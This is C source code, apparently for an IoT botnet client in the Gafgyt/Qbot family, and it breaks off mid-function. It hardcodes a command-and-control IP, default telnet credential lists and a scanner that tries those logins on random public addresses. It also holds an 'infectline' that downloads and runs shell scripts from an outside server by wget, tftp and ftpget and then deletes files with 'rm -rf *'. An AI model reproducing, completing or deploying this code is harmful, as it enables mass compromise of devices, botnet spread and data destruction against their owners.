unix.c (Public Release Refreshed)

1.  
2. // ___ __ _
3. // / \___ / _(_)_ __ ___ ___
4. // / /\ / _ \ |_| | '_ \ / _ \/ __|
5. // / /_// __/ _| | | | | __/\__ \
6. // /___,' \___|_| |_|_| |_|\___||___/
7.  
8. #define PR_SET_NAME 15
9. #define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))
10. #define PAD_RIGHT 1
11. #define PAD_ZERO 2
12. #define PRINT_BUF_LEN 12
13. #define CMD_IAC 255
14. #define CMD_WILL 251
15. #define CMD_WONT 252
16. #define CMD_DO 253
17. #define CMD_DONT 254
18. #define OPT_SGA 3
19.  
20.  
21.  
22. // _____ _ _
23. // \_ \_ __ ___| |_ _ __| | ___ ___
24. // / /\/ '_ \ / __| | | | |/ _` |/ _ \/ __|
25. // /\/ /_ | | | | (__| | |_| | (_| | __/\__ \
26. // \____/ |_| |_|\___|_|\__,_|\__,_|\___||___/
27.  
28. #include <stdlib.h>
29. #include <stdarg.h>
30. #include <stdio.h>
31. #include <sys/socket.h>
32. #include <sys/types.h>
33. #include <netinet/in.h>
34. #include <arpa/inet.h>
35. #include <netdb.h>
36. #include <signal.h>
37. #include <strings.h>
38. #include <string.h>
39. #include <sys/utsname.h>
40. #include <unistd.h>
41. #include <fcntl.h>
42. #include <errno.h>
43. #include <netinet/ip.h>
44. #include <netinet/udp.h>
45. #include <netinet/tcp.h>
46. #include <sys/wait.h>
47. #include <sys/ioctl.h>
48. #include <net/if.h>
49.  
50. char *infectline = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.88.234.115/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 23.88.234.115 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tf1tp2.sh -g 23.88.234.115; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 23.88.234.115 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit\r\n";
51.  
52. // WGET LINE GOES HERE ^
53.  
54. unsigned char *commServer[] =
55. {
56. "23.88.234.115:118"
57. };
58. char *useragents[] = {
59. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
60. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
61. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
62. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
63. "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
64. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
65. "Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
66. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
67. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
68. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
69. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
70. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
71. "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
72. "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
73. "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
74. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1",
75. "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
76. "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
77. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
78. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
79. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",
80. "Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
81. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
82. };
83.  
84. int initConnection();
85. int getBogos(unsigned char *bogomips);
86. int getCores();
87. int getCountry(unsigned char *buf, int bufsize);
88. void makeRandomStr(unsigned char *buf, int length);
89. int sockprintf(int sock, char *formatStr, ...);
90. char *inet_ntoa(struct in_addr in);
91.  
92. int mainCommSock = 0, currentServer = -1, gotIP = 0;
93. uint32_t *pids;
94. uint32_t scanPid;
95. uint64_t numpids = 0;
96. struct in_addr ourIP;
97. unsigned char macAddress[6] = {0};
98. char *usernames[] = {"root\0", "admin\0", "user\0", "login\0", "guest\0", "support\0", "cisco\0","ubunt","toor\0"};
99. char *passwords[] = {"root\0", "toor\0", "admin\0", "user\0", "guest\0", "login\0", "changeme\0", "1234\0", "12345\0", "123456\0", "default\0", "pass\0", "password\0", "support\0", "vizxv\0", "cisco\0","ubunt"};
100.  
101. #define PHI 0x9e3779b9
102. static uint32_t Q[4096], c = 362436;
103.  
104. void init_rand(uint32_t x)
105. {
106. int i;
107.  
108. Q[0] = x;
109. Q[1] = x + PHI;
110. Q[2] = x + PHI + PHI;
111.  
112. for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
113. }
114.  
115. uint32_t rand_cmwc(void)
116. {
117. uint64_t t, a = 18782LL;
118. static uint32_t i = 4095;
119. uint32_t x, r = 0xfffffffe;
120. i = (i + 1) & 4095;
121. t = a * Q[i] + c;
122. c = (uint32_t)(t >> 32);
123. x = t + c;
124. if (x < c) {
125. x++;
126. c++;
127. }
128. return (Q[i] = r - x);
129. }
130.  
131. void trim(char *str)
132. {
133. int i;
134. int begin = 0;
135. int end = strlen(str) - 1;
136.  
137. while (isspace(str[begin])) begin++;
138.  
139. while ((end >= begin) && isspace(str[end])) end--;
140. for (i = begin; i <= end; i++) str[i - begin] = str[i];
141.  
142. str[i - begin] = '\0';
143. }
144.  
145. static void printchar(unsigned char **str, int c)
146. {
147. if (str) {
148. **str = c;
149. ++(*str);
150. }
151. else (void)write(1, &c, 1);
152. }
153.  
154. static int prints(unsigned char **out, const unsigned char *string, int width, int pad)
155. {
156. register int pc = 0, padchar = ' ';
157.  
158. if (width > 0) {
159. register int len = 0;
160. register const unsigned char *ptr;
161. for (ptr = string; *ptr; ++ptr) ++len;
162. if (len >= width) width = 0;
163. else width -= len;
164. if (pad & PAD_ZERO) padchar = '0';
165. }
166. if (!(pad & PAD_RIGHT)) {
167. for ( ; width > 0; --width) {
168. printchar (out, padchar);
169. ++pc;
170. }
171. }
172. for ( ; *string ; ++string) {
173. printchar (out, *string);
174. ++pc;
175. }
176. for ( ; width > 0; --width) {
177. printchar (out, padchar);
178. ++pc;
179. }
180.  
181. return pc;
182. }
183.  
184. static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase)
185. {
186. unsigned char print_buf[PRINT_BUF_LEN];
187. register unsigned char *s;
188. register int t, neg = 0, pc = 0;
189. register unsigned int u = i;
190.  
191. if (i == 0) {
192. print_buf[0] = '0';
193. print_buf[1] = '\0';
194. return prints (out, print_buf, width, pad);
195. }
196.  
197. if (sg && b == 10 && i < 0) {
198. neg = 1;
199. u = -i;
200. }
201.  
202. s = print_buf + PRINT_BUF_LEN-1;
203. *s = '\0';
204.  
205. while (u) {
206. t = u % b;
207. if( t >= 10 )
208. t += letbase - '0' - 10;
209. *--s = t + '0';
210. u /= b;
211. }
212.  
213. if (neg) {
214. if( width && (pad & PAD_ZERO) ) {
215. printchar (out, '-');
216. ++pc;
217. --width;
218. }
219. else {
220. *--s = '-';
221. }
222. }
223.  
224. return pc + prints (out, s, width, pad);
225. }
226.  
227. static int print(unsigned char **out, const unsigned char *format, va_list args )
228. {
229. register int width, pad;
230. register int pc = 0;
231. unsigned char scr[2];
232.  
233. for (; *format != 0; ++format) {
234. if (*format == '%') {
235. ++format;
236. width = pad = 0;
237. if (*format == '\0') break;
238. if (*format == '%') goto out;
239. if (*format == '-') {
240. ++format;
241. pad = PAD_RIGHT;
242. }
243. while (*format == '0') {
244. ++format;
245. pad |= PAD_ZERO;
246. }
247. for ( ; *format >= '0' && *format <= '9'; ++format) {
248. width *= 10;
249. width += *format - '0';
250. }
251. if( *format == 's' ) {
252. register char *s = (char *)va_arg( args, int );
253. pc += prints (out, s?s:"(null)", width, pad);
254. continue;
255. }
256. if( *format == 'd' ) {
257. pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
258. continue;
259. }
260. if( *format == 'x' ) {
261. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
262. continue;
263. }
264. if( *format == 'X' ) {
265. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
266. continue;
267. }
268. if( *format == 'u' ) {
269. pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
270. continue;
271. }
272. if( *format == 'c' ) {
273. scr[0] = (unsigned char)va_arg( args, int );
274. scr[1] = '\0';
275. pc += prints (out, scr, width, pad);
276. continue;
277. }
278. }
279. else {
280. out:
281. printchar (out, *format);
282. ++pc;
283. }
284. }
285. if (out) **out = '\0';
286. va_end( args );
287. return pc;
288. }
289.  
290. int zprintf(const unsigned char *format, ...)
291. {
292. va_list args;
293. va_start( args, format );
294. return print( 0, format, args );
295. }
296.  
297. int szprintf(unsigned char *out, const unsigned char *format, ...)
298. {
299. va_list args;
300. va_start( args, format );
301. return print( &out, format, args );
302. }
303.  
304.  
305. int sockprintf(int sock, char *formatStr, ...)
306. {
307. unsigned char *textBuffer = malloc(2048);
308. memset(textBuffer, 0, 2048);
309. char *orig = textBuffer;
310. va_list args;
311. va_start(args, formatStr);
312. print(&textBuffer, formatStr, args);
313. va_end(args);
314. orig[strlen(orig)] = '\n';
315. zprintf("buf: %s\n", orig);
316. int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL);
317. free(orig);
318. return q;
319. }
320.  
321. static int *fdopen_pids;
322.  
323. int fdpopen(unsigned char *program, register unsigned char *type)
324. {
325. register int iop;
326. int pdes[2], fds, pid;
327.  
328. if (*type != 'r' && *type != 'w' || type[1]) return -1;
329.  
330. if (pipe(pdes) < 0) return -1;
331. if (fdopen_pids == NULL) {
332. if ((fds = getdtablesize()) <= 0) return -1;
333. if ((fdopen_pids = (int *)malloc((unsigned int)(fds * sizeof(int)))) == NULL) return -1;
334. memset((unsigned char *)fdopen_pids, 0, fds * sizeof(int));
335. }
336.  
337. switch (pid = vfork())
338. {
339. case -1:
340. close(pdes[0]);
341. close(pdes[1]);
342. return -1;
343. case 0:
344. if (*type == 'r') {
345. if (pdes[1] != 1) {
346. dup2(pdes[1], 1);
347. close(pdes[1]);
348. }
349. close(pdes[0]);
350. } else {
351. if (pdes[0] != 0) {
352. (void) dup2(pdes[0], 0);
353. (void) close(pdes[0]);
354. }
355. (void) close(pdes[1]);
356. }
357. execl("/bin/sh", "sh", "-c", program, NULL);
358. _exit(127);
359. }
360. if (*type == 'r') {
361. iop = pdes[0];
362. (void) close(pdes[1]);
363. } else {
364. iop = pdes[1];
365. (void) close(pdes[0]);
366. }
367. fdopen_pids[iop] = pid;
368. return (iop);
369. }
370.  
371. int fdpclose(int iop)
372. {
373. register int fdes;
374. sigset_t omask, nmask;
375. int pstat;
376. register int pid;
377.  
378. if (fdopen_pids == NULL || fdopen_pids[iop] == 0) return (-1);
379. (void) close(iop);
380. sigemptyset(&nmask);
381. sigaddset(&nmask, SIGINT);
382. sigaddset(&nmask, SIGQUIT);
383. sigaddset(&nmask, SIGHUP);
384. (void) sigprocmask(SIG_BLOCK, &nmask, &omask);
385. do {
386. pid = waitpid(fdopen_pids[iop], (int *) &pstat, 0);
387. } while (pid == -1 && errno == EINTR);
388. (void) sigprocmask(SIG_SETMASK, &omask, NULL);
389. fdopen_pids[fdes] = 0;
390. return (pid == -1 ? -1 : WEXITSTATUS(pstat));
391. }
392.  
393. unsigned char *fdgets(unsigned char *buffer, int bufferSize, int fd)
394. {
395. int got = 1, total = 0;
396. while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
397. return got == 0 ? NULL : buffer;
398. }
399.  
400. static const long hextable[] = {
401. [0 ... 255] = -1,
402. ['0'] = 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
403. ['A'] = 10, 11, 12, 13, 14, 15,
404. ['a'] = 10, 11, 12, 13, 14, 15
405. };
406.  
407. long parseHex(unsigned char *hex)
408. {
409. long ret = 0;
410. while (*hex && ret >= 0) ret = (ret << 4) | hextable[*hex++];
411. return ret;
412. }
413.  
414. int wildString(const unsigned char* pattern, const unsigned char* string) {
415. switch(*pattern)
416. {
417. case '\0': return *string;
418. case '*': return !(!wildString(pattern+1, string) || *string && !wildString(pattern, string+1));
419. case '?': return !(*string && !wildString(pattern+1, string+1));
420. default: return !((toupper(*pattern) == toupper(*string)) && !wildString(pattern+1, string+1));
421. }
422. }
423.  
424. int getHost(unsigned char *toGet, struct in_addr *i)
425. {
426. struct hostent *h;
427. if((i->s_addr = inet_addr(toGet)) == -1) return 1;
428. return 0;
429. }
430.  
431. void uppercase(unsigned char *str)
432. {
433. while(*str) { *str = toupper(*str); str++; }
434. }
435.  
436. int getBogos(unsigned char *bogomips)
437. {
438. int cmdline = open("/proc/cpuinfo", O_RDONLY);
439. char linebuf[4096];
440. while(fdgets(linebuf, 4096, cmdline) != NULL)
441. {
442. uppercase(linebuf);
443. if(strstr(linebuf, "BOGOMIPS") == linebuf)
444. {
445. unsigned char *pos = linebuf + 8;
446. while(*pos == ' ' || *pos == '\t' || *pos == ':') pos++;
447. while(pos[strlen(pos)-1] == '\r' || pos[strlen(pos)-1] == '\n') pos[strlen(pos)-1]=0;
448. if(strchr(pos, '.') != NULL) *strchr(pos, '.') = 0x00;
449. strcpy(bogomips, pos);
450. close(cmdline);
451. return 0;
452. }
453. memset(linebuf, 0, 4096);
454. }
455. close(cmdline);
456. return 1;
457. }
458.  
459. int getCores()
460. {
461. int totalcores = 0;
462. int cmdline = open("/proc/cpuinfo", O_RDONLY);
463. char linebuf[4096];
464. while(fdgets(linebuf, 4096, cmdline) != NULL)
465. {
466. uppercase(linebuf);
467. if(strstr(linebuf, "BOGOMIPS") == linebuf) totalcores++;
468. memset(linebuf, 0, 4096);
469. }
470. close(cmdline);
471. return totalcores;
472.  
473. }
474.  
475. void makeRandomStr(unsigned char *buf, int length)
476. {
477. int i = 0;
478. for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;
479. }
480.  
481. int recvLine(int socket, unsigned char *buf, int bufsize)
482. {
483. memset(buf, 0, bufsize);
484.  
485. fd_set myset;
486. struct timeval tv;
487. tv.tv_sec = 30;
488. tv.tv_usec = 0;
489. FD_ZERO(&myset);
490. FD_SET(socket, &myset);
491. int selectRtn, retryCount;
492. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
493. while(retryCount < 10)
494. {
495. sockprintf(mainCommSock, "PING");
496.  
497. tv.tv_sec = 30;
498. tv.tv_usec = 0;
499. FD_ZERO(&myset);
500. FD_SET(socket, &myset);
501. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
502. retryCount++;
503. continue;
504. }
505.  
506. break;
507. }
508. }
509.  
510. unsigned char tmpchr;
511. unsigned char *cp;
512. int count = 0;
513.  
514. cp = buf;
515. while(bufsize-- > 1)
516. {
517. if(recv(mainCommSock, &tmpchr, 1, 0) != 1) {
518. *cp = 0x00;
519. return -1;
520. }
521. *cp++ = tmpchr;
522. if(tmpchr == '\n') break;
523. count++;
524. }
525. *cp = 0x00;
526.  
527. // zprintf("recv: %s\n", cp);
528.  
529. return count;
530. }
531.  
532. int connectTimeout(int fd, char *host, int port, int timeout)
533. {
534. struct sockaddr_in dest_addr;
535. fd_set myset;
536. struct timeval tv;
537. socklen_t lon;
538.  
539. int valopt;
540. long arg = fcntl(fd, F_GETFL, NULL);
541. arg |= O_NONBLOCK;
542. fcntl(fd, F_SETFL, arg);
543.  
544. dest_addr.sin_family = AF_INET;
545. dest_addr.sin_port = htons(port);
546. if(getHost(host, &dest_addr.sin_addr)) return 0;
547. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
548. int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
549.  
550. if (res < 0) {
551. if (errno == EINPROGRESS) {
552. tv.tv_sec = timeout;
553. tv.tv_usec = 0;
554. FD_ZERO(&myset);
555. FD_SET(fd, &myset);
556. if (select(fd+1, NULL, &myset, NULL, &tv) > 0) {
557. lon = sizeof(int);
558. getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
559. if (valopt) return 0;
560. }
561. else return 0;
562. }
563. else return 0;
564. }
565.  
566. arg = fcntl(fd, F_GETFL, NULL);
567. arg &= (~O_NONBLOCK);
568. fcntl(fd, F_SETFL, arg);
569.  
570. return 1;
571. }
572.  
573. int listFork()
574. {
575. uint32_t parent, *newpids, i;
576. parent = fork();
577. if (parent <= 0) return parent;
578. numpids++;
579. newpids = (uint32_t*)malloc((numpids + 1) * 4);
580. for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
581. newpids[numpids - 1] = parent;
582. free(pids);
583. pids = newpids;
584. return parent;
585. }
586.  
587. int negotiate(int sock, unsigned char *buf, int len)
588. {
589. unsigned char c;
590.  
591. switch (buf[1]) {
592. case CMD_IAC: /*dropped an extra 0xFF wh00ps*/ return 0;
593. case CMD_WILL:
594. case CMD_WONT:
595. case CMD_DO:
596. case CMD_DONT:
597. c = CMD_IAC;
598. send(sock, &c, 1, MSG_NOSIGNAL);
599. if (CMD_WONT == buf[1]) c = CMD_DONT;
600. else if (CMD_DONT == buf[1]) c = CMD_WONT;
601. else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
602. else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
603. send(sock, &c, 1, MSG_NOSIGNAL);
604. send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
605. break;
606.  
607. default:
608. break;
609. }
610.  
611. return 0;
612. }
613.  
614. int matchPrompt(char *bufStr)
615. {
616. char *prompts = ":>%$#\0";
617.  
618. int bufLen = strlen(bufStr);
619. int i, q = 0;
620. for(i = 0; i < strlen(prompts); i++)
621. {
622. while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;
623. if(*(bufStr + bufLen - q) == prompts[i]) return 1;
624. }
625.  
626. return 0;
627. }
628.  
629. int readUntil(int fd, char *toFind, int matchLePrompt, int timeout, int timeoutusec, char *buffer, int bufSize, int initialIndex)
630. {
631. int bufferUsed = initialIndex, got = 0, found = 0;
632. fd_set myset;
633. struct timeval tv;
634. tv.tv_sec = timeout;
635. tv.tv_usec = timeoutusec;
636. unsigned char *initialRead = NULL;
637.  
638. while(bufferUsed + 2 < bufSize && (tv.tv_sec > 0 || tv.tv_usec > 0))
639. {
640. FD_ZERO(&myset);
641. FD_SET(fd, &myset);
642. if (select(fd+1, &myset, NULL, NULL, &tv) < 1) break;
643. initialRead = buffer + bufferUsed;
644. got = recv(fd, initialRead, 1, 0);
645. if(got == -1 || got == 0) return 0;
646. bufferUsed += got;
647. if(*initialRead == 0xFF)
648. {
649. got = recv(fd, initialRead + 1, 2, 0);
650. if(got == -1 || got == 0) return 0;
651. bufferUsed += got;
652. if(!negotiate(fd, initialRead, 3)) return 0;
653. } else {
654. if(strstr(buffer, toFind) != NULL || (matchLePrompt && matchPrompt(buffer))) { found = 1; break; }
655. }
656. }
657.  
658. if(found) return 1;
659. return 0;
660. }
661.  
662. static uint8_t ipState[5];
663. in_addr_t getRandomPublicIP()
664. {
665. if(ipState[1] < 255 && ipState[2] < 255 && ipState[3] < 255 && ipState[4] < 255)
666. {
667. ipState[1]++;
668. ipState[2]++;
669. ipState[3]++;
670. ipState[4]++;
671. char ip[16];
672. szprintf(ip, "%d.%d.%d.%d", ipState[1], ipState[2], ipState[3], ipState[4]);
673. return inet_addr(ip);
674. }
675.  
676. ipState[1] = 0;
677. ipState[2] = 0;
678. ipState[3] = 0;
679. ipState[4] = 0;
680. while(
681. (ipState[1] == 0) ||
682. (ipState[1] == 10) ||
683. (ipState[1] == 100 && (ipState[2] >= 64 && ipState[2] <= 127)) ||
684. (ipState[1] == 127) ||
685. (ipState[1] == 169 && ipState[2] == 254) ||
686. (ipState[1] == 172 && (ipState[2] <= 16 && ipState[2] <= 31)) ||
687. (ipState[1] == 192 && ipState[2] == 0 && ipState[3] == 2) ||
688. (ipState[1] == 192 && ipState[2] == 88 && ipState[3] == 99) ||
689. (ipState[1] == 192 && ipState[2] == 168) ||
690. (ipState[1] == 198 && (ipState[2] == 18 || ipState[2] == 19)) ||
691. (ipState[1] == 198 && ipState[2] == 51 && ipState[3] == 100) ||
692. (ipState[1] == 203 && ipState[2] == 0 && ipState[3] == 113) ||
693. (ipState[1] >= 224)
694. )
695. {
696. ipState[1] = rand() % 150;
697. ipState[2] = rand() % 150;
698. ipState[3] = rand() % 150;
699. ipState[4] = rand() % 150;
700. }
701.  
702. char ip[16];
703. szprintf(ip, "%d.%d.%d.%d", ipState[1], ipState[2], ipState[3], ipState[4]);
704. return inet_addr(ip);
705. }
706.  
707. in_addr_t getRandomIP(in_addr_t netmask)
708. {
709. in_addr_t tmp = ntohl(ourIP.s_addr) & netmask;
710. return tmp ^ ( rand_cmwc() & ~netmask);
711. }
712.  
713. unsigned short csum (unsigned short *buf, int count)
714. {
715. register uint64_t sum = 0;
716. while( count > 1 ) { sum += *buf++; count -= 2; }
717. if(count > 0) { sum += *(unsigned char *)buf; }
718. while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
719. return (uint16_t)(~sum);
720. }
721.  
722. unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph)
723. {
724.  
725. struct tcp_pseudo
726. {
727. unsigned long src_addr;
728. unsigned long dst_addr;
729. unsigned char zero;
730. unsigned char proto;
731. unsigned short length;
732. } pseudohead;
733. unsigned short total_len = iph->tot_len;
734. pseudohead.src_addr=iph->saddr;
735. pseudohead.dst_addr=iph->daddr;
736. pseudohead.zero=0;
737. pseudohead.proto=IPPROTO_TCP;
738. pseudohead.length=htons(sizeof(struct tcphdr));
739. int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
740. unsigned short *tcp = malloc(totaltcp_len);
741. memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
742. memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
743. unsigned short output = csum(tcp,totaltcp_len);
744. free(tcp);
745. return output;
746. }
747.  
748. void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize)
749. {
750. iph->ihl = 5;
751. iph->version = 4;
752. iph->tos = 0;
753. iph->tot_len = sizeof(struct iphdr) + packetSize;
754. iph->id = rand_cmwc();
755. iph->frag_off = 0;
756. iph->ttl = MAXTTL;
757. iph->protocol = protocol;
758. iph->check = 0;
759. iph->saddr = source;
760. iph->daddr = dest;
761. }
762.  
763. int sclose(int fd)
764. {
765. if(3 > fd) return 1;
766. close(fd);
767. return 0;
768. }
769.  
770. void StartTheLelz()
771. {
772. int max = (getdtablesize() / 4) * 3, i, res;
773. fd_set myset;
774. struct timeval tv;
775. socklen_t lon;
776. int valopt;
777.  
778. max = max > 4096 ? 4096 : max;
779.  
780. struct sockaddr_in dest_addr;
781. dest_addr.sin_family = AF_INET;
782. dest_addr.sin_port = htons(23);
783. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
784.  
785. struct telstate_t
786. {
787. int fd;
788. uint32_t ip;
789. uint8_t state;
790. uint8_t complete;
791. uint8_t usernameInd;
792. uint8_t passwordInd;
793. uint32_t totalTimeout;
794. uint16_t bufUsed;
795. char *sockbuf;
796. } fds[max];
797. memset(fds, 0, max * (sizeof(int) + 1));
798. for(i = 0; i < max; i++) { fds[i].complete = 1; fds[i].sockbuf = malloc(1024); memset(fds[i].sockbuf, 0, 1024); }
799. struct timeval timeout;
800. timeout.tv_sec = 5;
801. timeout.tv_usec = 0;
802. while(1)
803. {
804. for(i = 0; i < max; i++)
805. {
806. switch(fds[i].state)
807. {
808. case 0:
809. {
810. memset(fds[i].sockbuf, 0, 1024);
811.  
812. if(fds[i].complete) { char *tmp = fds[i].sockbuf; memset(&(fds[i]), 0, sizeof(struct telstate_t)); fds[i].sockbuf = tmp; fds[i].ip = getRandomPublicIP(); }
813. else {
814. fds[i].passwordInd++;
815. if(fds[i].passwordInd == sizeof(passwords) / sizeof(char *)) { fds[i].passwordInd = 0; fds[i].usernameInd++; }
816. if(fds[i].usernameInd == sizeof(usernames) / sizeof(char *)) { fds[i].complete = 1; continue; }
817. }
818. dest_addr.sin_family = AF_INET;
819. dest_addr.sin_port = htons(23);
820. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
821. dest_addr.sin_addr.s_addr = fds[i].ip;
822. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
823. setsockopt (fds[i].fd, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout, sizeof(timeout));
824. setsockopt (fds[i].fd, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout));
825. if(fds[i].fd == -1) { continue; }
826. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
827. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) { /*printf("close %lu\n",fds[i].ip);*/ sclose(fds[i].fd); fds[i].complete = 1; }
828. else { fds[i].state = 1; fds[i].totalTimeout = 0; }
829. }
830. break;
831.  
832. case 1:
833. {
834. if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
835.  
836. FD_ZERO(&myset);
837. FD_SET(fds[i].fd,